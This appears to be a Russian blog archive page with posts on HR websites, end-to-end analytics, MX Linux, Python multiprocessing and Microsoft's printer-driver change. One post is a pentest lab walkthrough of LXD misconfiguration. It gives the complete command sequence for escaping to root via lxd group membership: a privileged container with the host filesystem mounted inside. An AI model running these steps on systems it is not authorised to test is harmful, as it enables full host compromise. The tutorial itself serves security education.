Архив автора: admin

Сайт HR

Какие сайты следует посещать HR-специалистам. Где лучше всего читать последние новости, откуда можно узнать нужную аналитику и последние тенденции? Авторитетными ли являются те источники, которые предоставляют информацию в интернете?

Представляем вам полезную подборку сайтов для HR-специалистов, кадровиков и менеджеров. Рекомендуем ознакомиться с ними и может быть даже добавить к себе в закладки.

  1. Добыто — является специализированным сайтом для кадровых специалистов. На нем есть информация о специализированном сервисе для ведения кадрового документооборота и обучения персонала, а также блог. В блоге вы найдете различную полезную информацию о кадрах, ведении документооборота, журналов кадрового учета, развитии и управлении. Есть функции поиска, удобная навигация и возможность задать свой вопрос в комментариях.

  2. HRpuls.ru — данный сайт, также еще является и кадровым интернет-журналом, с названием «Пульс кадровой индустрии». Вместе с ним также есть и статьи, заметки с различной полезной информацией, касающейся кадровиков и HR-специалистов. Отдельный раздел — это блоги популярных рекрутеров с их практическим опытом.

  3. HRm.ru. Это один из довольно больших и старых ресурсов по HR-менеджменту. На сайте размещено море различной информации, однако всю ее лучше перепроверять.

  4. HR-portal.ru. Довольно популярный ресурс. На данном сайте размещено очень много материалов как на кадровую, так и на другие тематики, пусть порой они и далеки от основной.

  5. Hrmaximum.ru — на данном сайте предлагается очень большое количество различных типовых форм кадровых документов. Все они доступны для скачивания.

  6. Pro-personal.ru — это специализированный информационный портал для кадровых специалистов. Много очень даже интересных и информативных заметок и статей.

  7. 4hr.ru — это электронный журнал, в котором размещено очень много переводных статей на кадровую тематику.

  8. Кадровик.ру — это также довольно популярный интернет-ресурс, который ориентирован на кадровиков. Там можно найти множество статей, шаблонов документов и инструкций, а также нормативные документы, касающиеся кадров и HR.

  9. Hr-journal.ru — это интернет журнал, в нем размещаются авторские статьи от настоящих HR-профессионалов.

  10. HR по-русски (или hr-elearning.ru). На данном портале размещаются разнообразные новости, а также события в мире HR, рекрутинга. Кроме того, предлагаются различные методики обучения, адаптации и мотивации сотрудников.

 

Специализированные сайты и порталы в настоящее время значительно упрощают жизнь кадровым специалистам. Ведь ранее, для поиска информации приходилось искать специализированную литературу, издания.

Еще один немаловажный факт — порталы и сайты для поиска сотрудников. Сейчас век технологий — и не нужно анализировать большое количество папок с личными делами и проводить оффлайн кастинги и собеседования. В том числе новые технологии меняют и ускоряют работу HR-специалистов. Давайте рассмотрим основные и наиболее популярные онлайн-сервисы по подбору персонала, которые значительно увеличат эффективность работы кадровиков и рекрутеров:

  • Добыто. Знания — это специализированная база-знаний, созданная на основе искусственного интеллекта. В основе лежит уникальная методика Цеттелькастена. Это означает, что можно хранить информацию, превращая ее в нейросеть компании. Система не только будет хранить и извлекать необходимую информацию, когда это требуется, при этом она также может применяться для обучения других сотрудников.

  • робот Вера — это онлайн-рекрутер, разработанный на основе искусственного интеллекта, российская разработка. Робот умеет эффективно искать резюме на различных сайтах в соответствии с критериями компании, а также самостоятельно совершать звонки, предоставлять необходимые сведения и и даже организовывать видеоинтервью с потенциальными кандидатами.

  • Potok — это специализированная платформа, предназначенная для оптимизации кадровых процессов, в основном набора персонала — контроля всех этапов поиска и проведения собеседований, разработки заявок под каждую конкретную вакансию. Платформа также имеет в своем составе и базу данных, полностью интегрирующуюся со специализированными сайтами и социальными сетями. В ней можно создать и свой собственный сайт, персонализированные формы отклика и различные отчеты.

  • Stafory — является одним из специализированных сервисов для фрилансеров, при помощи него можно найти работу. Помогает фильтровать все поступающие предложения, сортировать их по различным критериям, а также сохранять резюме соискателей, вести календарь собеседований и планировать их.

  • Различные сайты и сервисы. Кроме того, в своей работе кадровики и рекрутеры также применяют специализированные сайты по подбору персонала (HeadHunter, SuperJob и другие), а также социальные сети, поисковики или же платформу Workle — это специализированная платформа для удаленной работы, в которой каждая компания может создать свой лендинг. На ней также можно проводить онлайн-собеседования.



2023-09-08T19:29:05
Бизнес

Сквозная аналитика: Исследование потока данных для успеха бизнеса

Современный бизнес подразумевает не только высокое качество продукции или услуг, но и глубокое понимание рынка, потребителей и внутренних процессов. В этом контексте сквозная аналитика становится ключевым инструментом, позволяющим компаниям анализировать и использовать данные для принятия эффективных стратегических решений.

 

Что такое сквозная аналитика?

Сквозная аналитика — это метод анализа данных, который позволяет компаниям отслеживать и анализировать весь путь взаимодействия клиента с брендом, начиная от первого контакта и до завершения сделки. Этот анализ охватывает все точки контакта с клиентом, включая веб-сайты, социальные сети, электронную почту, телефонные звонки и многое другое.

Цель сквозной аналитики — предоставить компаниям полную картину взаимодействия клиентов с брендом, а также выявить наиболее эффективные каналы коммуникации и влияние каждого из них на конверсию и продажи.

 

Преимущества сквозной аналитики

  1. Глубокое понимание клиентского поведения: Сквозная аналитика помогает выявить предпочтения и потребности клиентов, анализируя их взаимодействие с различными каналами и платформами.

  2. Оптимизация маркетинговых кампаний: Анализ данных позволяет выявить наиболее эффективные каналы привлечения клиентов, что позволяет сосредотачиваться на них и увеличивать ROI.

  3. Улучшение пользовательского опыта: Изучив путь клиента от первого контакта до совершения покупки, компании могут оптимизировать веб-сайт, улучшить качество обслуживания и сделать взаимодействие более удобным и эффективным.

  4. Рост конверсии и продаж: Благодаря анализу каждой стадии пути клиента к покупке, можно выявить узкие места и улучшить процесс, что приведет к увеличению конверсии и объемов продаж.

  5. Адаптация к изменяющимся условиям рынка: Постоянный мониторинг и анализ данных позволяют компаниям оперативно реагировать на изменения в потребительском спросе и рыночных тенденциях.

 

Ключевые этапы сквозной аналитики

  1. Сбор данных: На этом этапе собираются данные со всех доступных источников — от веб-аналитики и социальных сетей до CRM-систем и колл-центров.

  2. Интеграция данных: Для анализа необходимо объединить данные из разных источников в единую базу данных, что позволяет получить полную картину взаимодействия клиентов с брендом.

  3. Анализ и визуализация: На этом этапе данные анализируются с использованием специальных аналитических инструментов, а результаты представляются в наглядной форме.

  4. Принятие решений: На основе анализа компании могут принимать обоснованные стратегические решения, направленные на оптимизацию бизнес-процессов и улучшение результатов.

 

Заключение

Сквозная аналитика — неотъемлемый элемент современного бизнеса, обеспечивающий компаниям глубокое понимание клиентов и эффективное управление взаимодействием с ними. Путем анализа данных на всех этапах взаимодействия с клиентами, компании могут достичь высоких результатов и обеспечить устойчивый рост своего бизнеса.



2023-09-08T18:31:30
Бизнес

MX Service Manager: новый инструмент в MX Linux 23

MX Service Manager: новый инструмент в MX Linux 23

MX Service Manager: новый инструмент в MX Linux 23

Без сомнения, Debian GNU / Linux Это один из самых популярных, используемых и стабильных материнских дистрибутивов в мире. Linuxverse. По этой причине многие из его дочерних дистрибутивов (производных) оказываются столь же замечательными и полезными. Однако не для всех из них обычно характерно наличие собственной посылочной службы, т.е. надежная коллекция собственных инструментов. Кроме того, оригинальные и инновационные функции, а также специальные конфигурации или настройки, которые действительно делают его достойным внимания сообщества Linux.

Таким образом, хорошим примером этого случая обычно является дистрибутивы antiX и MX. В их число входит солидная и постоянно растущая коллекция проприетарных инструментов, которые в случае MX Linux обычно называются MX. Инструменты (Инструменты MX). И сегодня, 7 сентября 2023 года, они анонсировали еще один полезный инструмент, который дополняет указанную коллекцию, имя которой «Менеджер службы MX», то знакомству с ним мы посвятим эту своевременную публикацию.



Читать

Python 3 Многопроцессорность

В статье рассмотрим многопроцессорность в Python 3, а именно модуль multiprocessing и его классы: Process, Queue, Manager, Listen и Client.





Читать

🐧 Неправильная конфигурация контейнеров Linux

В этой статье мы рассмотрим мир Linux-контейнеров (LXD/LXC) и их внутреннее устройство.

Кроме того, мы предоставим исчерпывающее руководство по настройке контейнера для целей тестирования, в том числе о том, что делать, если что-то пошло не так.

Самое главное – мы покажем, как злоумышленники могут использовать неправильно сконфигурированные контейнеры для получения системных привилегий, что подчеркивает острую необходимость обеспечения безопасности контейнеров.

В этой статье будут рассмотрены следующие темы:

  • Обзор Lxc и Lxd

  • Различия между Lxc и Lxd

  • Конфигурация Lxd

  • Неправильная настройка привилегий Lxd

  • Как использовать неправильно настроенный контейнер?

LXC

LXC, или Linux Containers, – это технология виртуализации на уровне операционной системы Linux.

Она позволяет запускать несколько независимых Linux-систем, называемых контейнерами, на одной хост-машине.

Каждый контейнер работает изолированно и имеет свою память, сетевые ресурсы и файловые системы.

Приложения контейнеров воспринимаются как работающие на отдельной физической машине.

LXC предлагает эффективный и действенный метод работы многих экземпляров Linux на одном хосте с минимальной деградацией и низкими накладными расходами.

Он востребован для развертывания приложений, тестирования систем, разработки и построения облачных инфраструктур.

LXC поддерживается ядром Linux и управляется с помощью различных инструментов, включая интерфейс командной строки LXC (CLI) и различные графические интерфейсы.

Она обладает гибкой и модульной архитектурой, позволяющей пользователям настраивать контейнеры в соответствии с их конкретными потребностями и требованиями.

LXD

LXD, сокращение от Linux Container Daemon, – это контейнерный гипервизор, позволяющий управлять контейнерами LXC с помощью удобного интерфейса.

Он использует технологию LXC и позволяет создавать системные контейнеры.

LXD оптимизирован для работы в Ubuntu и других дистрибутивах Linux, поддерживающих snap-пакеты.

LXD позволяет создавать, управлять и исполнять контейнеры с помощью REST API и интерфейса командной строки.

REST API позволяет программно управлять контейнерами, а интерфейс командной строки обеспечивает эффективное взаимодействие с контейнерами непосредственно из терминала.

LXD известен своей способностью к масштабированию и различными средствами защиты, которые предотвращают взлом контейнеров злоумышленниками.

Он предлагает такие высокотехнологичные средства защиты, как AppArmor и SELinux, позволяющие изолировать контейнеры и хосты.

Кроме того, LXD поддерживает живую миграцию контейнеров между хостами, что позволяет без проблем переносить рабочие нагрузки в различные среды.

В целом LXD – это мощный инструмент для управления Linux-контейнерами, упрощающий контейнеризацию и позволяющий пользователям безопасно и эффективно запускать приложения.

🔥 Реализация мандатного контроля доступа с помощью SELinux или AppArmor в Linux

Разница между LXC и LXD

LXC (Linux Containers) и LXD (Linux Container Daemon) – обе технологии, используемые для контейнеризации в Linux, но между ними есть некоторые различия:

  • LXC – это интерфейс пользовательского пространства для контейнерных функций ядра Linux, а LXD – это демон, предоставляющий RESTful API для управления контейнерами LXC.

  • LXC предназначен в первую очередь для создания и управления легкими системными контейнерами, в то время как LXD представляет собой полноценное решение для управления контейнерами, включающее такие функции, как живая миграция, кластеризация и управление хранением.

  • Кроме того, LXD предоставляет более удобный интерфейс командной строки и графический веб-интерфейс для управления контейнерами, в то время как LXC полагается на инструменты командной строки для управления.

  • LXD является более высокоуровневой абстракцией LXC, добавляющей такие функции, как управление образами контейнеров, создание моментальных снимков и управление сетью, в дополнение к основной функциональности LXC.

В итоге, если LXC обеспечивает основную функциональность контейнеризации в Linux, то LXD строится на ее основе и представляет собой полноценное решение для управления контейнерами с дополнительными возможностями и более удобным интерфейсом.

Настройка LxD

Теперь давайте выполним шаги по установке и настройке контейнера LXD в нашей системе.

Сначала с помощью утилиты ‘apt’ мы установим lxd и другие зависимости.



apt install lxd
   



apt install zfsutils-linux

После установки контейнера и его зависимостей мы можем запустить демон контейнера lxd с помощью команды ‘systemctl’.



systemctl start lxd

Неправильная настройка привилегий LXD

Для неправильной настройки контейнера создадим низкопривилегированного пользователя ‘pentest’ и дадим ему право управлять контейнерами lxd.

Создать пользователя можно с помощью команды ‘useradd’.

Команда ‘-p’ указывает пароль, ‘-s’ – shell и ‘-m’ – каталог пользователя, совпадающий с именем пользователя.



useradd -p ‘Password1’ -s ‘/bin/bash’ -m pentest

После создания пользователя мы можем использовать команду ‘usermod’ для добавления пользователя в группу lxd.

Это действие даст пользователю ‘pentest’ право на управление контейнерами.



usermod --append --groups lxd pentest

Мы также можем создать файл root.txt в корневом каталоге, чтобы проверить эксплойт, прочитав этот файл.



echo ‘We Got Root’ > root.txt

Пользователь pentest теперь является членом группы lxd

Теперь, используя эту неправильную конфигурацию, мы можем эксплуатировать систему и получить оболочку привилегированного пользователя.

Эксплуатация неправильно сконфигурированного контейнера

Первым шагом будет настройка нового пула хранения.

Для этого мы можем воспользоваться командой lxd init.



lxd init

Мы также можем проверить созданный нами пул хранения с помощью команды lxc.



lxc storage list

После создания пула хранения нам понадобится любой скомпилированный образ для контейнера lxd, который можно загрузить с GitHub.

В нашем сценарии хост-машина имеет доступ в Интернет, но если это не так, злоумышленник может сгенерировать собственный скомпилированный образ для lxd и передать его на хост-машину.

Давайте загрузим ‘lxd-alpine-builder’ и соберем образ.



git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder/ 
./build-alpine

После выполнения приведенных выше команд мы скомпилировали образ для контейнера lxd.

Теперь необходимо импортировать скомпилированный образ в контейнер.

Мы можем использовать lxc для импорта образа в контейнер.

Здесь мы именуем образ alpine как ‘Myimage’.



lxc image import ./ alpine-v3.17-x86_64-20230302_1107.tar.gz --alias MyImage
lxc image list

Наш скомпилированный образ импортирован в контейнер.

Теперь мы выполним несколько команд lxc, чтобы настроить привилегии для нашего скомпилированного образа.

Нам необходимо создать контейнер с использованием импортированного образа (MyImage).

Для этого необходимо создать экземпляр образа контейнера (с именем Itsec), после чего можно назначить привилегии безопасности созданному экземпляру.



lxc init MyImage itsec -c security.privileged=true

Смонтируйте корневой каталог хост-машины ( / ) в качестве алиаса (HostDir) в контейнер lxd по пути ‘/mnt/’



lxc config device add itsec HostDir disk source=/ path=/mnt/root recursive=true

Запуск контейнера



lxc start itsec

Получим оболочку для контейнера lxd.



lxc exec itsec /bin/sh

Проверка целостности контейнера lxd



id 
Hostname

Мы получили доступ к нашему контейнеру lxd, и в приведенном выше статусе мы смонтировали корневой каталог хост-машины (/) в папку /mnt/ контейнера.

Оказавшись внутри контейнера, мы можем перейти в каталог /mnt/root и увидеть все ресурсы хост-машины.

Мы можем получить доступ к файлу root.txt, созданному ранее, подтвердив тем самым права root-доступа.



cd /mnt/root/root 
ls

В этом руководсте мы рассмотрели, как простая неправильная конфигурация контейнера lxd позволяет злоумышленнику скомпрометировать всю систему и получить root shell на хост-машине.



2023-09-08T14:43:40
Закрытие уязвимостей

Microsoft объявляет о прекращении поддержки сторонних драйверов принтеров Windows

Microsoft официально объявила, что прекратит поддержку сторонних драйверов принтеров в Windows. Это означает, что в ближайшие годы производители принтеров могут больше не распространять свои драйверы через обновление Windows.

Я не использовал принтер более десяти лет, но вы когда-нибудь замечали, как легко просто подключить и воспроизвести принтер в Windows? Это потому, что, по большей части, Windows, насколько я помню, поддерживала драйверы, созданные производителем, для Windows Update.

Однако, начиная с Windows 10 21H2, Microsoft добавила поддержку входящих сообщений для Mopria-совместимых принтеров через сетевые и USB-интерфейсы через драйвер класса Microsoft IPP, и эту идею с этим новым объявление это прекратить стороннюю поддержку в пользу этого стандарта.

Альянс Mopria был представлен в 2013 году компанией Canon, HP, Samsung и Xerox с целью создания универсальных стандартов и решений для поддержки сканирования и печати. В дополнение к этим членам, Брат, Эпсон, Microsoft, Лексмарк, Kyocera, С тех пор Adobe и некоторые другие поддержали этот новый стандарт с более чем 6000 совместимыми моделями принтеров и более чем тремя миллиардами установок на сегодняшний день.

Этот альянс в сочетании с драйвером класса Microsoft IPP имеет дополнительное преимущество, заключающееся в устранении необходимости в специальных установщиках и драйверах, а также внедрение улучшений производительности и надежности и совместимости в широком спектре принтеров и версий Windows.

Итак, в чем же суета? Что ж, устаревшие принтеры, которые не поддерживают технологию Mopria и драйвер класса Microsoft IPP, скорее всего, придется обновлять вручную или в худшем случае, в конечном итоге устаревают, как говорит производитель Windows, он также начнет процесс поэтапного отказа от устаревших драйверов принтеров v3 и v4.

Если вы когда-либо были в приемной или офисе вашего местного супермаркета или работали в ИТ-отделе крупной корпорации или даже малых и средних предприятий, Вы бы знали, что существуют миллионы устаревших принтеров и копировальных аппаратов, которые давно истекли срок их погашения, и это даже не учитывает офисный принтер вашей мамы.

К счастью, понимая, что этот процесс затронет большое количество его клиентов, Microsoft в течение ряда лет будет осуществлять этот процесс следующим образом:

  • Сентябрь 2023: Объявите устаревший сторонний драйвер принтера для плана Windows по окончанию обслуживания.

  • 2025: Новые драйверы принтера не будут опубликованы в обновлении Windows. Существующие драйверы принтера в обновлении Windows все еще могут быть обновлены.

  • 2026: Порядок ранжирования драйверов принтеров изменен, чтобы всегда отдавать предпочтение драйверу Windows IPP inbox-класса.

  • 2027: За исключением исправлений, связанных с безопасностью, сторонние обновления драйверов принтера больше не будут разрешены. Существующие сторонние драйверы принтера могут быть установлены из Windows Update, или пользователи могут устанавливать драйверы принтера, используя программы установки принтера.

 

Таким образом, ключевые выводы являются; Microsoft продолжит поддерживать существующие пакеты установки принтера даже после завершения плана обслуживания, подробно описанного выше, при условии, что для устройства доступен сторонний драйвер. Компания также не будет препятствовать установке новых драйверов принтеров даже после 2027 года, за исключением того, что обновления в эфире через Windows Update больше не будут разрешены. Наконец, изменение в конце службы применяется ко всем версиям Windows, включая Windows 10 и 11.



2023-09-08T08:32:35
Microsoft